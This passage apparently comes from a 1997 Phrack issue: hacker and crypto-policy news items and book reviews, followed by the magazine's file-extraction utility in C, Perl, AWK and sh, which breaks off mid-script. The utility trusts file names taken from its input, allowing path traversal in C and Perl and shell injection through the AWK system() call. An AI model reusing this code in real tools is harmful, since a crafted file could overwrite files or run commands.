"Government" interference. Mr. Mitnick needs help drafting a 
Habeas Corpus petition with points and authorities to be submitted 
by him pro-se. His objective is to be granted reasonable access 
to law library materials to assist in his own defense. 


If you would like to help Kevin, please contact him at the 
following address: 


Mr. Kevin Mitnick 
Reg. No. 89950-012 
P.O. Box 1500 
Los Angeles, CA 90053-1500 


0x9> 


Title: Kevin Mitnick Press Release 
Source: Press Release 
Author: Donald C. Randolph 
Date: August 7, 1997 


THE UNITED STATES V. KEVIN DAVID MITNICK 
I. Proceedings to Date 


With 25 counts of alleged federal computer and wire fraud violations still 
pending against him, the criminal prosecution of Kevin Mitnick is 
approaching its most crucial hour. The trial is anticipated to begin in 
January, 1998. In reaching this point, however, Kevin has already 
experienced years of legal battles over alleged violations of the 
conditions of his supervised release and for possession of unauthorized 
cellular access codes. 


A. Settling the "Fugitive" Question 


The seemingly unexceptional charges relating to supervised release 
violations resulted in months of litigation when the government attempted 
to tack on additional allegations for conduct occurring nearly three years 
after the scheduled expiration of Kevin’s term of supervised release in 
December, 1992. The government claimed that Kevin had become a fugitive 
prior to the expiration of his term, thereby "tolling" the term and 
allowing for the inclusion of additional charges. After months of 
increasingly bold assertions concerning Kevin’s "fugitive" status, 
evidentiary hearings were held in which the government was forced to 
concede that its original position in this matter was unsupported by the 
facts. 


B. Sentencing 


In June of this year Kevin was sentenced for certain admitted violations of 
his supervised release and for possession of unauthorized access codes. 
The court imposed a sentence of 22 months instead of the 32 months sought 
by the government. Since Kevin has been in custody since his arrest in 
February 1995, this sentence has been satisfied. We are currently 
preparing a request for release on bail. 


During this stage of the proceedings, the government sought to impose 
restrictions on Kevin’s access to computers which were so severe as to 
virtually prohibit him from functioning altogether in today’s society. The 
proposed restrictions sought to completely prohibit Kevin from "using or 
possessing" all computer hardware equipment, software programs, and 
wireless communications equipment. After arguments that such restrictions 
unduly burdened Kevin’s freedom to associate with the on-line computer 
community and were not reasonably necessary to ensure the protection of the 
public, the court modified its restrictions by allowing for computer access 
with the consent of the Probation Office. Nonetheless, the defense 
believes that the severe restrictions imposed upon Mr. Mitnick are 
unwarranted in this case and is, therefore, pursuing an appeal to the Ninth 
Circuit. 


II. The Government Seeks to make an Example of Mr. Mitnick 


One of the strongest motivating factors for the government in the 
prosecution of Kevin Mitnick is a desire to send a message to other 
would-be "hackers". The government has hyped this prosecution by 
exaggerating the value of loss in the case, seeking unreasonably stiff 
sentences, and by painting a portrait of Kevin which conjures the likeness 
of a cyber-boogie man. 


There are a number of objectives prompting the government’s tactics in this 
respect. First, by dramatically exaggerating the amount of loss at issue 
in the case (the government arbitrarily claims losses exceed some $80 
million) the government can seek a longer sentence and create a 
high-profile image for the prosecution. Second, through a long sentence 
for Kevin, the government hopes to encourage more guilty pleas in future 
cases against other hackers. For example, a prosecutor offering a moderate 
sentence in exchange for a guilty plea would be able to use Kevin Mitnick’s 
sentence as an example of what "could happen" if the accused decides to go 
to trial. Third, by striking fear into the hearts of the public over the 
dangers of computer hackers, the government hopes to divert scrutiny away 
from its own game-plan regarding the control and regulation of the Internet 
and other telecommunications systems. 


III. Crime of Curiosity 


The greatest injustice in the prosecution of Kevin Mitnick is revealed when 
one examines the actual harm to society (or lack thereof) which resulted 
from Kevin’s actions. To the extent that Kevin is a "hacker" he must be 
considered a purist. The simple truth is that Kevin never sought monetary 
gain from his hacking, though it could have proven extremely profitable. 
Nor did he hack with the malicious intent to damage or destroy other 
people’s property. Rather, Kevin pursued his hacking as a means of 
satisfying his intellectual curiosity and applying Yankee ingenuity. These 
attributes are more frequently promoted rather than punished by society. 


The ongoing case of Kevin Mitnick is gaining increased attention as the 
various issues and competing interests are played out in the arena of the 
courtroom. Exactly who Kevin Mitnick is and what he represents, however, 
is ultimately subject to personal interpretation and to the legacy which 
will be left by "The United States v. Kevin David Mitnick". 


0xa> 


Title: SAFE crypto bill cracked again 
Source: 
Author: Alex Lash and Dan Goodin 
Date: September 12, 1997, 8:40 a.m. PT 


For the second time in a week, a House committee has made significant 
changes to the Security and Freedom through Encryption (SAFE) Act to 
mandate that domestic encryption products give law enforcement agencies 
access to users’ messages. 


The changes by the Intelligence Committee, which were passed as a 
"substitute" to SAFE, turn the legislation on its head. The amendment 
follows similar changes two days ago in the House National Security 
Committee. 


Initially drafted as a way to loosen U.S. export controls on encryption, 
legislators have instead "marked up" the bill, or amended it at the 
committee level, to reflect the wishes of the Federal Bureau of 
Investigation and other law enforcement agencies that want "wiretap" 
access to all encrypted email and other digital files. 


Both the Intelligence and the National Security committees tend to favor 
export controls, because they view encryption as a threat to 
information-gathering activities by U.S. military and law enforcement 
officials. 


The Intelligence Committee cited those concerns today when announcing 
the substitute legislation. "Terrorist groups...drug cartels...and those 
who proliferate in deadly chemical and biological weapons are all 
formidable opponents of peace and security in the global society," said 
committee chairman Porter Goss (R-Florida) in a statement. "These bad 
actors must know that the U.S. law enforcement and national security 
agencies, working under proper oversight, will have the tools to 
frustrate illegal and deadly activity and bring international criminals 
to justice." 


Opponents of government attempts to regulate encryption, including a 
leading panel of cryptographers, have argued that built-in access to 
encrypted files would in fact threaten national and individual security 
and be prohibitively expensive to implement. 


The amended legislation calls for all imported or U.S.-made encryption 
products that are manufactured or distributed after January 31, 2000, to 
provide "immediate access" to the decrypted text if the law officials 
present a court order. "Law enforcement will specifically be required to 
obtain a separate court order to have the data, including 
communications, decrypted." 


A markup of the same bill in the House Commerce Committee was postponed 
today for two weeks. It will be the fifth such committee vote on the 
bill since its introduction. 


The Intelligence and National Security amendments this week are by no 
means a defeat of the bill. Instead, they would have to be reconciled 
with versions of the bill already approved by the House Judiciary and 
International Relations committees. That reconciliation most likely 
would have to happen on the House floor. The rapidly fragmenting bill 
still has several layers of procedure to wend through before it reaches 
a potential floor vote, but people on both sides of the encryption 
debate openly question if the bill--in any form--will make it that far 
this year. 


The legislation has 252 cosponsors, more than half of the House 
membership. 


0xb> 


Title: RC5 Cracked - The unknown message is... 
Source: 
Author: David McNett <nugget@slacker.com> 
Date: Mon, 27 Oct 1997 08:43:38 -0500 


-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1 


It is a great privilege and we are excited to announce that at 13:25 
GMT on 19-Oct-1997, we found the correct solution for RSA Labs’ RC5- 
32/12/7 56-bit secret-key challenge. Confirmed by RSA Labs, the key 
0x532B744CC20999 presented us with the plaintext message for which we 
have been searching these past 250 days. 


The unknown message is: It’s time to move to a longer key length 


In undeniably the largest distributed-computing effort ever, the 
Bovine RC5 Cooperative (http://www.distributed.net/), under the 
leadership of distributed.net, managed to evaluate 47% of the 
keyspace, or 34 quadrillion keys, before finding the winning key. At 
the close of this contest our 4000 active teams were processing over 
7 billion keys each second at an aggregate computing power equivalent 
to more than 26 thousand Pentium 200’s or over 11 thousand PowerPC 
604e/200’s. Over the course of the project, we received block 
submissions from over 500 thousand unique IP addresses. 


The winning key was found by Peter Stuer <peter@dinf.vub.ac.be> with 
an Intel Pentium Pro 200 running Windows NT Workstation, working for 
the STARLab Bovine Team coordinated by Jo Hermans 
<Jo.Hermans@vub.ac.be> and centered in the Computer Science 
Department (DINF) of the Vrije Universiteit (VUB) in Brussels, 
Belgium. (http://dinf.vub.ac.be/bovine.html/). Jo’s only comments 
were that "$1000 will buy a lot of beer" and that he wished that the 
solution had been found by a Macintosh, the platform that represented 
the largest portion of his team’s cracking power. Congratulations 
Peter and Jo! 


Of the US$10000 prize from RSA Labs, they will receive US$1000 and 
plan to host an unforgettable party in celebration of our collective 
victory. If you’re anywhere near Brussels, you might want to find 
out when the party will be held. US$8000, of course, is being 
donated to Project Gutenberg (http://www.promo.net/pg/) to assist 
them in their continuing efforts in converting literature into 
electronic format for the public use. The remaining US$1000 is being 
retained by distributed.net to assist in funding future projects. 


Equally important are the thanks, accolades, and congratulations due 
to all who participated and contributed to the Bovine RC5-56 Effort! 
The thousands of teams and tens of thousands of individuals who have 
diligently tested key after key are the reason we are so successful. 


The thrill of finding the key more than compensates for the sleep, 
food, and free time that we’ve sacrificed! 


Special thanks go to all the coders and developers, especially Tim 
Charron, who has graciously given his time and expertise since the 
earliest days of the Bovine effort. Thanks to all the coordinators 
and keyserver operators: Chris Chiapusio, Paul Chvostek, Peter 
Denitto, Peter Doubt, Mishari Muqbil, Steve Sether, and Chris 
Yarnell. Thanks to Andrew Meggs, Roderick Mann, and Kevyn Shortell 
for showing us the true power of the Macintosh and the strength of 
its users. We’d also like to thank Dave Avery for attempting to 
bridge the gap between Bovine and the other RC5 efforts. 


Once again, a heartfelt clap on the back goes out to all of us who 
have run the client. Celebrations are in order. I’d like to invite 
any and all to join us on the EFNet IRC network channel #rc5 for 
celebrations as we regroup and set our sights on the next task. Now 
that we’ve proven the limitations of a 56-bit key length, let’s go 
one further and demonstrate the power of distributed computing! We 
are, all of us, the future of computing. Join the excitement as the 
world is forced to take notice of the power we’ve harnessed. 


Moo and a good hearty laugh. 


Adam L. Beberg - Client design and overall visionary 
Jeff Lawson - keymaster/server network design and morale booster 
David McNett - stats development and general busybody 


0xc> 


Title: Kashpureff in custody. 

Source: Marc Hurst <mhurst@fastlane.ca> 
Author: Marc Hurst <mhurst@fastlane.ca> 
Date: Fri, 31 Oct 1997 10:40:20 -0500 (EST) 


Eugene Kashpureff, known for his redirect of the NSI web page, 
was apprehended this morning in Toronto by undercover RCMP 
detectives. 


Pending a deportation hearing, he will be returned to New York to 
face Felony Wire Fraud charges that were sworn out against him 
after he had settled out of court with NSI in regard to their 
civil suit. 


Early in the week Eugene relinquished control of the Alternic to 
an adhoc industry group and that group will be making an 
announcement in the next few days. 


At this time I have no further information to volunteer. 


Sincerely 
Marc Hurst 


0xd> 


Title: XS4ALL refuses Internet tap 

Source: Press Release 

Author: Maurice Wessling 

Date: November 13th 1997, Amsterdam, Netherlands. 


XS4ALL Internet is refusing to comply with an instruction from the 
Dutch Ministry of Justice that it should tap the Internet traffic 
of one of its users as part of an investigation. XS4ALL has 
informed the Ministry that in its view the instruction lacks any 
adequate legal basis. The company’s refusal makes it liable for a 
penalty but XS4ALL is hoping for a trial case to be brought in the 
near future so that a court can make a pronouncement. 


On Friday October 31st, a detective and a computer expert from the 
Forensic Science Laboratory issued the instruction to XS4ALL. The 
Ministry of Justice wants XS4ALL to tap for a month all Internet 
traffic to and from this user and then supply the information to 
the police. This covers e-mail, the World Wide Web, news groups, 
IRC and all Internet services that this person uses. XS4ALL would 
have to make all the technical arrangements itself. 


As far as we are aware, there is no precedent in the Netherlands 
for the Ministry of Justice issuing such a far-reaching 
instruction to an Internet provider. The detectives involved also 
acknowledge as much. Considering that a national meeting of 
Examining judges convened to discuss the instruction, one may 
appreciate just how unprecedented this situation is. Hitherto, 
instructions have mainly been confined to requests for personal 
information on the basis of an e-mail address. 


XS4ALL feels obliged in principle to protect its users and their 
privacy. Furthermore, XS4ALL has a commercial interest, since it 
must not run the risk of action being brought by users under Civil 
Law on account of unlawful deeds. This could happen with such an 
intervention by the provider which is not based in law. Finally, 
it is important from the social point of view that means of 
investigation have adequate statutory basis. To comply with the 
instruction could act as an undesirable precedent which could have 
a major impact on the privacy of all Internet users in the 
Netherlands. 


XS4ALL has no view on the nature of the investigation itself or 
the alleged crimes. It is happy to leave the court to decide that. 
Nor will XS4ALL make any comment on the content of the study or 
the region in which this is occurring for it is not its intention 
that the investigation should founder. XS4ALL has proposed in vain 
to the examining judge that the instruction be recast in terms 
which ensures the legal objections are catered for. 




The Ministry of Justice based its claim on Article 125i of the 
Penal Code. This article was introduced in 1993 as part of the 
Computer Crime Act. It gives the examining judge the option of 
advising third parties during statutory preliminary investigations 
to provide data stored in computers in the interest of 
establishing the truth. According to legal history, it was never 
the intention to apply this provision to an instruction focused on 
the future. Legislators are still working to fill this gap in the 
arsenal of detection methods, by analogy with the Ministry of 
Justice tapping phone lines (125g of the Penal Code). The Dutch 
Constitution and the European Convention on the Protection of 
Human Rights demand a precise statutory basis for violating basic 
rights such as privacy and confidentiality of correspondence. The 
Ministry clearly does not wish to wait for this and is now 
attempting to use Article 125i of the Penal Code, which is not 
intended for this purpose, to compel providers themselves to start 
tapping suspect users. The Ministry of Justice is taking the risk 
of the prosecution of X, in the context of which the instruction 
was issued to XS4ALL, running aground on account of using illegal 
detection methods. Here, again, XS4ALL does not wish to be liable 
in any respect in this matter. 


For information please contact: 


XS4ALL 

Maurice Wessling 
email: maurice@xs4all.nl 
http://www.xs4all.nl/ 


0xf> 


Title: The FCC Wants V-Chip in PCs too 
Source: Cyber-Liberties Update 
Author: 


Date: Monday, November 3, 1997 


Mandating that all new televisions have built-in censorship technology 
is not the only thing that the Federal Communications Commission (FCC) 
is seeking, said ACLU Associate Director Barry Steinhardt, it is also 
looking to require that the same technology be added to all new personal 
computers. 


Last year, culminating a protracted campaign against TV violence, 
Congress passed the Telecommunications Act of 1996, a law requiring that 
new televisions be equipped with the so-called V-chip. The V-chip is a 
computerized chip capable of detecting program ratings and blocking 
adversely rated programs from view. 


Now, the FCC has announced that it is soliciting public comments through 
November 24, on the idea of placing V-chips inside personal computers 
since some are capable of delivering television programming. 


"At the time the V-chip was being considered we warned that with the 
growing convergence between traditional television (broadcast and cable) 
and the Internet, it was only a matter of time before the government 
would move to require that the V-chip be placed in PC’s. Now that has 
happened," Steinhardt said. 


"Hardwiring censorship technology into the PC is part of the headlong 
rush to a scheme of rating and blocking Internet content that will turn 
the Internet into a bland homogenized medium in which only large 
corporate interest will have truly free speech," Steinhardt said. 


The ACLU has criticized the mandatory requirement of V-chip arguing that 
it is a form of censorship clearly forbidden by the First Amendment. 


"Although its supporters claim the V-chip gives parents control over 
their children’s viewing habits, in fact it will function as a 
governmental usurpation of parental control," said Solange Bitol, 
Legislative Counsel for the ACLU’s Washington National Office. 


"Under the legislation, it is the government (either directly or by 
coercing private industry), and not the parents, that will determine how 
programs will be rated. If a parent activates the V-chip, all programs 
with a "violent" rating will be blocked. What kind of violence will be 
censored? Football games? War movies? News reports?" she added. 


The ACLU is opposed to mandatory addition or use of censoring 
technologies and we will be filing comments with the FCC later this 
month. We believe people are smart enough to turn off their television 
sets or PCs on their own if they don’t like what they see. 


Tell the FCC what you think. Submit comments to them online at 
<http://www.fcc.gov/vchip/>, and send us a copy as well so that we make 
sure your voice is heard. E-mail them to CSehgal@aclu.org. 


To subscribe to the ACLU Cyber-Liberties Update, send a message to 
majordomo@aclu.org with "subscribe Cyber-Liberties" in the body of your 
message. To terminate your subscription, send a message to 
majordomo@aclu.org with "unsubscribe Cyber-Liberties" in the body. 


1x1> 


Book Title: Underground 
Poster: George Smith via Crypt Newsletter 
Date: 27 Aug 97 00:36:12 EDT 
From: "George Smith [CRYPTN]" <70743.1711@CompuServe.COM> 


Subject: File 5--An "Underground" Book on Australian Hackers Burns the Mind 


Source — CRYPT NEWSLETTER 44 




AN "UNDERGROUND" BOOK ON AUSTRALIAN HACKERS BURNS THE MIND 


Crypt News reads so many bad books, reports and news pieces on 
hacking and the computing underground that it’s a real pleasure to 
find a writer who brings genuine perception to the subject. 
Suelette Dreyfus is such a writer, and "Underground," published by 
the Australian imprint, Mandarin, is such a book. 


The hacker stereotypes perpetrated by the mainstream media include 
descriptions which barely even fit any class of real homo sapiens 
Crypt News has met. The constant regurgitation of idiot slogans 
-- "Information wants to be free," "Hackers are just people who 
want to find out how things work" -- insults the intelligence. 


After all, have you ever met anyone who wouldn’t want their access 
to information to be free or who didn’t admit to some curiosity 
about how the world works? No -- of course not. Dreyfus’ 
"Underground" is utterly devoid of this manner of patronizing 
garbage and the reader is the better for it. 


"Underground" is, however, quite a tale of human frailty. Its 
strength comes not from the feats of hacking it portrays -- and 
there are plenty of them -- but in the emotional and physical cost 
to the players. It’s painful to read about people like Anthrax, an 
Australian 17-year old trapped in a dysfunctional family. 
Anthrax’s father is abusive and racist, so the son -- paradoxically 
-- winds up being a little too much like him for comfort, 
delighting in victimizing complete strangers with mean jokes and 
absorbing the anti-Semitic tracts of Louis Farrakhan. For no 
discernible reason, the hacker repetitively baits an old man 
living in the United States with harassing telephone calls. 
Anthrax spends months of his time engaged in completely pointless, 
obsessed hacking of a sensitive U.S. military system. Inevitably, 
Anthrax becomes entangled in the Australian courts and his life 
collapses. 


Equally harrowing is the story of Electron whose hacking pales in 
comparison to his duel with mental illness. Crypt News challenges 
the readers of "Underground" not to squirm at the image of 
Electron, his face distorted into a fright mask of rolling eyes 
and open mouth due to tardive dyskinesia, a side-effect of being 
put on anti-schizophrenic medication. 


Dreyfus expends a great deal of effort exploring what happens when 
obsession becomes the only driving force behind her subjects’ 
hacking. In some instances, "Underground’s" characters degenerate 
into mental illness, others try to find solace in drugs. This is 
not a book in which the hackers declaim at any great length upon 
contorted philosophies in which the hacker positions himself as 
someone whose function is a betterment to society, a lubricant of 
information flow, or a noble scourge of bureaucrats and tyrants. 
Mostly, they hack because they’re good at it, it affords a measure 
of recognition and respect -- and it develops a grip upon them 
which goes beyond anything definable by words. 


Since this is the case, "Underground" won’t be popular with the 
goon squad contingent of the police corps and computer security 
industry. Dreyfus’ subjects aren’t the kind that come neatly 
packaged in the 
"throw-’em-in-jail-for-a-few-years-while-awaiting-trial" 
phenomenon that’s associated with America’s Kevin Mitnick-types. 
However, the state of these hackers -- sometimes destitute, 
unemployable or in therapy -- at the end of their travails is 
seemingly quite sufficient punishment. 


Some things, however, never change. Apparently, much of 
Australia’s mainstream media is as dreadful at covering this type 
of story as America’s. Throughout "Underground," Dreyfus includes 
clippings from Australian newspapers featuring fabrications and 
exaggeration that bear almost no relationship to reality. Indeed, 
in one prosecution conducted within the United Kingdom, the 
tabloid press whipped the populace into a blood frenzy by 
suggesting a hacker under trial could have affected the outcome of 
the Gulf War in his trips through U.S. computers. 


Those inclined to seek the unvarnished truth will find 
"Underground" an excellent read. Before each chapter, Dreyfus 
presents a snippet of lyric chosen from the music of Midnight Oil. 
It’s an elegant touch, but I’ll suggest a lyric from another 
Australian band, a bit more obscure, to describe the spirit of 
"Underground." From Radio Birdman’s second album: "Burned my eye, 
burned my mind, I couldn’t believe it..." 

++++++++ 


["Underground: Tales of Hacking, Madness and Obsession on the 
Electronic Frontier" by Suelette Dreyfus with research by Julian 
Assange, Mandarin, 475 pp.] 


Excerpts and ordering information for "Underground" can be found 
on the Web at http://www.underground-book.com 


George Smith, Ph.D., edits the Crypt Newsletter from Pasadena, 
CA. 


1x2> 


Book Title: The Electronic Privacy Papers 
: Documents on the Battle for Privacy in the Age of Surveillance 
by: Bruce Schneier + David Banisar 
publisher: John Wiley 1997 
other: 747 pages, index, US$59.99 


_The Privacy Papers_ is not about electronic privacy in general: it covers 
only United States Federal politics, and only the areas of wiretapping 
and cryptography. The three topics covered are wiretapping and the 
Digital Telephony proposals, the Clipper Chip, and other controls on 
cryptography (such as export controls and software key escrow proposals). 


The documents included fall into several categories. There are broad 
overviews of the issues, some of them written just for this volume. 
There are public pronouncements and documents from various government 
bodies: legislation, legal judgements, policy statements, and so forth. 
There are government documents obtained under Freedom of Information 
requests (some of them partially declassified documents complete with 
blacked out sections and scrawled marginal annotations), which tell 
the story of what happened behind the scenes. And there are newspaper 
editorials, opinion pieces, submissions to government enquiries, and 
policy statements from corporations and non-government organisations, 
presenting the response from the public. 


Some of the material included in _The Privacy Papers_ is available 
online, none of it is breaking news (the cut-off for material appears 
to be mid-to-late 1996), and some of the government documents included 
are rather long-winded (no surprise there). It is not intended to be a 
"current affairs" study, however; nor is it aimed at a popular audience. 
_The Privacy Papers_ will be a valuable reference sourcebook for anyone 
involved with recent government attempts to control the technology 
necessary for privacy -- for historians, activists, journalists, 
lobbyists, researchers, and maybe even politicians. 
%T The Electronic Privacy Papers 
%S Documents on the Battle for Privacy in the Age of Surveillance 
%A Bruce Schneier 
%A David Banisar 
%I John Wiley 
%C New York 
%D 1997 
%O hardcover, bibliography, index 
%G ISBN 0-471-12297-1 
%P xvi, 747pp 
%K crime, politics, computing 

1x3> 

Book Title: "Computer Security and Privacy: An Information Sourcebook: 
Topics and Issues for the 21st Century" 


by Mark W. Greenia 

List: $29.95 

Publisher: Lexikon Services 
Win/Disk Edition 

Binding: Software 

Expected publication date: 1998 
ISBN: 0944601154 


[PWN: I haven’t seen this one in stores, and no further information or 
reviews have been found. ] 


3x1> 

CDT POLICY POST Volume 3, Number 12 August 11, 1997 

(1) CIVIL LIBERTIES GROUPS ASK FCC TO BLOCK FBI ELECTRONIC SURVEILLANCE 
PROPOSAL 

The Center for Democracy and Technology and the Electronic Frontier 
Foundation today filed a petition with the Federal Communications 
Commission to block the FBI from using the 1994 "Digital Telephony" law to 
expand government surveillance powers. 


The law, officially known as the "Communications Assistance for Law 
Enforcement Act" (CALEA), was intended to preserve law enforcement 
wiretapping ability in the face of changes in communications technologies. 
In their filing, CDT and EFF argue that the FBI has tried to use CALEA to 
expand its surveillance capabilities by forcing telephone companies to 
install intrusive and expensive surveillance features that threaten privacy 
and violate the scope of the law. 


3x2> 
Anti-Spam Bills in Congress 
Source — ACLU Cyber-Liberties Update, Tuesday, September 2, 1997 


Unsolicited e-mail advertisement, or "spam," has few fans on the 
net. Court battles have been waged between service providers, such 
as AOL and Compuserve, and spam advertisers, including Cyber 
Promotions, over whether the thousands of messages sent to user 
e-mails can be blocked. Congress and several state legislatures 
have also stepped into the debate and have introduced some bills 
fraught with First Amendment problems because they ban commercial 
speech altogether or are content specific. 


[Laws against spam.. oh neat. So, how do they plan on enforcing it?] 
3x3> 


JUSTICE DEPARTMENT CHARGES MICROSOFT WITH VIOLATING 1995 COURT ORDER 


Asks Court to Impose $1 Million a Day Fine if Violation Continues 


WASHINGTON, D.C. -- The Department of Justice asked a 
federal court today to hold Microsoft Corporation--the world’s 
dominant personal computer software company--in civil contempt 
for violating terms of a 1995 court order barring it from 
imposing anticompetitive licensing terms on manufacturers of 
personal computers. 


[PWN: Hey Bill.. nah nah nah, thptptptptptptp, nanny nanny boo boo] 


3x4> 


Small Minds Think Alike 
Source - : fight-censorship@vorlon.mit.edu 


CyberWire Dispatch Bulletin 


Washington --In this boneyard of Washington, DC it doesn’t take 
long for big dawgs and small alike to bark. A couple of small 
ones yipped it up today. 


Rep. Marge (no relation to Homer) Roukema, R-N.J. and Sen. Lauch 
(??) Faircloth, R-N.C. introduced a bill to amend the 
Communications Act that would ban convicted sex offenders from 
using the Internet. 


[PWN: Oh yeah.. that will be easy to enforce. ] 


3x5> 
Cyber Promotions tossed offline 


Cyber Promotions tossed offline 
By Janet Kornblum 
September 19, 1997, 1:25 p.m. PT 


Cyber Promotions, antispammers’ enemy No. 1 on the Net, has once again 
been dumped by its access provider. 


Backbone provider AGIS cut off Cyber Promotions Wednesday, and the 
company has been scrambling for another ISP since. 


[PWN: Hey Samford... ha ha ha, nanny nanny, thptptptptp.] 


"Ping-flood attacks observed originating from the West Coast into AGIS 
and directed to the Washington and Philadelphia routers severely 
degraded AGIS network performance to [an] unacceptable level...AGIS 
had no alternative but to shut off services to Cyber Promotions," 
reads a statement that Wallace put on his page. He alleged that the 
statement came from an AGIS engineer. 


[PWN: If a ping flood took them down this time...] 
[ Phrack Magazine Extraction Utility 


[ Phrack Staff 


Added to the list of extraction variants this time is a version in AWK, 
and a version in sh. Also, the C version has been spruced up to accept 
file name globs. Keep ‘em coming... 


8< CUT-HERE >8 


<++> PEU/extract2.c
/* extract.c by Phrack Staff and sirsyko
 *
 * (c) Phrack Magazine, 1997
 *
 * 1.8.98 rewritten by route:
 *  - aesthetics
 *  - now accepts file globs
 * todo:
 *  - more info in tag header (file mode, checksum)
 *
 * Extracts textfiles from a specially tagged flatfile into a hierarchical
 * directory structure.  Use to extract source code from any of the articles
 * in Phrack Magazine (first appeared in Phrack 50).
 *
 * gcc -o extract extract.c
 *
 * ./extract file1 file2 file3
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <dirent.h>

#define BEGIN_TAG   "<++> "
#define END_TAG     "<-->"
#define BT_SIZE     strlen(BEGIN_TAG)
#define ET_SIZE     strlen(END_TAG)

struct f_name
{
    char name[256];
    struct f_name *next;
};

int
main(int argc, char **argv)
{
    char b[256], *bp, *fn;
    int i, j = 0;
    FILE *in_p, *out_p = NULL;
    struct f_name *fn_p = NULL, *head = NULL;

    if (argc < 2)
    {
        printf("Usage: %s file1 file2 ... filen\n", argv[0]);
        exit(0);
    }

    /*
     *  Fill the f_name list with all the files on the commandline (ignoring
     *  argv[0] which is this executable).  This includes globs, which the
     *  shell has already expanded by the time we see argv.
     */
    for (i = 1; (fn = argv[i++]); )
    {
        if (!head)
        {
            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
            {
                perror("malloc");
                exit(1);
            }
            strncpy(head->name, fn, sizeof(head->name) - 1);
            head->name[sizeof(head->name) - 1] = 0;
            head->next = NULL;
            fn_p = head;
        }
        else
        {
            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
            {
                perror("malloc");
                exit(1);
            }
            fn_p = fn_p->next;
            strncpy(fn_p->name, fn, sizeof(fn_p->name) - 1);
            fn_p->name[sizeof(fn_p->name) - 1] = 0;
            fn_p->next = NULL;
        }
    }
    /*
     *  Sentry node.
     */
    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
    {
        perror("malloc");
        exit(1);
    }
    fn_p = fn_p->next;
    fn_p->next = NULL;

    /*
     *  Check each file in the f_name list for extraction tags.
     */
    for (fn_p = head; fn_p->next; fn_p = fn_p->next)
    {
        if (!(in_p = fopen(fn_p->name, "r")))
        {
            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
            continue;
        }
        else fprintf(stderr, "Opened %s\n", fn_p->name);
        while (fgets(b, 256, in_p))
        {
            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
            {
                b[strcspn(b, "\r\n")] = 0;      /* Drop the newline; now we have a string. */
                j++;

                /*
                 *  Create each directory component of the tagged pathname.
                 *  NB: the name comes straight from the flatfile; nothing
                 *  here rejects ".." components or absolute paths.
                 */
                if ((bp = strchr(b + BT_SIZE + 1, '/')))
                {
                    while (bp)
                    {
                        *bp = 0;
                        mkdir(b + BT_SIZE, 0700);
                        *bp = '/';
                        bp = strchr(bp + 1, '/');
                    }
                }
                if ((out_p = fopen(b + BT_SIZE, "w")))
                {
                    printf("- Extracting %s\n", b + BT_SIZE);
                }
                else
                {
                    printf("Could not extract '%s'.\n", b + BT_SIZE);
                    continue;
                }
            }
            else if (!strncmp(b, END_TAG, ET_SIZE))
            {
                if (out_p)
                {
                    fclose(out_p);
                    out_p = NULL;               /* So a stray end tag cannot close it twice. */
                }
                else
                {
                    fprintf(stderr, "Error closing file %s.\n", fn_p->name);
                    continue;
                }
            }
            else if (out_p)
            {
                fputs(b, out_p);
            }
        }
        fclose(in_p);
    }
    if (!j) printf("No extraction tags found in list.\n");
    else printf("Extracted %d file(s).\n", j);
    return (0);
}
/* EOF */
<-->

<++> PEU/extract.pl
#!/bin/sh # -*- perl -*- -n
# Daos <daos@nym.alias.net>
eval 'exec perl $0 -S ${1+"$@"}' if 0;

# Perl honours the -n on the #! line above, so the body below runs once for
# every input line with that line in $_.  Run as: perl extract.pl <file>
$opening = 0;

if (/^\<\+\+\>/) { $curfile = substr($_, 5); $opening = 1; };
if (/^\<\-\-\>/) { close ct_ex; $opened = 0; };
if ($opening) {
    chop $curfile;
    # Create each directory component in turn so nested paths work; the mode
    # is numeric (the string "0777" would have been read as decimal 777).
    if ($curfile =~ m/\//) {
        $sex_dir = substr($curfile, 0, rindex($curfile, '/'));
        $path = '';
        foreach $part (split(/\//, $sex_dir)) {
            $path .= "$part/";
            mkdir $path, 0777 unless $part eq '' || -d $path;
        }
    }
    open(ct_ex, ">$curfile") || warn "Could not open $curfile: $!\n";
    print "Attempting extraction of $curfile\n";
    $opened = 1;
}
if ($opened && !$opening) { print ct_ex $_ };
<-->


<++> PEU/extract.awk
#!/usr/bin/awk -f
#
# Yet Another Extraction Script
# - <sirsyko>
#
# A "<++> path" line opens path for writing (creating the directories on the
# way), "<-->" closes it, and every line in between is copied verbatim.
/^\<\+\+\>/ {
    ind = 1
    File = $2
    split($2, dirs, "/")
    Dir = "."
    while (dirs[ind+1]) {
        Dir = Dir "/" dirs[ind]
        system("mkdir " Dir " 2>/dev/null")
        ++ind
    }
    next
}
/^\<\-\-\>/ {
    close(File)          # release the descriptor; awk limits open files
    File = ""
    next
}
File { print > File }    # ">" truncates on first use, then appends until close()
<-->


<++> PEU/extract.sh
#!/bin/sh
# extract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
#
# note, this file will create all directories relative to the current directory
# originally a bug, I've now upgraded it to a feature since I dont want to deal
# with the leading / (besides, you dont want hackers giving you full pathnames
# anyway, now do you :)
#
# Hopefully this will demonstrate another useful aspect of IFS other than
# haxoring rewt
#
# Usage: ./extract.sh <filename>

cat "$@" | (
Working=1
while [ $Working ];
do
        OLDIFS1="$IFS"
        IFS=
        if read -r Line; then           # -r: keep backslashes in the extracted text
                IFS="$OLDIFS1"
                set -- $Line
                case "$1" in
                "<++>")         OLDIFS2="$IFS"
                                IFS=/
                                set -- $2       # split the pathname on '/'
                                IFS="$OLDIFS2"
                                while [ $# -gt 1 ]; do
                                        File=${File:-"."}/$1
                                        if [ ! -d "$File" ]; then
                                                echo "Making dir $File"
                                                mkdir "$File"
                                        fi
                                        shift
                                done
                                File=${File:-"."}/$1
                                echo "Storing data in $File"
                ;;
                "<-->")         if [ "x$File" != "x" ]; then
                                        unset File
                                fi ;;
                *)              if [ "x$File" != "x" ]; then
                                        IFS=
                                        # printf rather than echo: no escape processing
                                        printf '%s\n' "$Line" >> "$File"
                                        IFS="$OLDIFS1"
                                fi
                ;;
                esac
                IFS="$OLDIFS1"
        else
                echo "End of file"
                unset Working
        fi
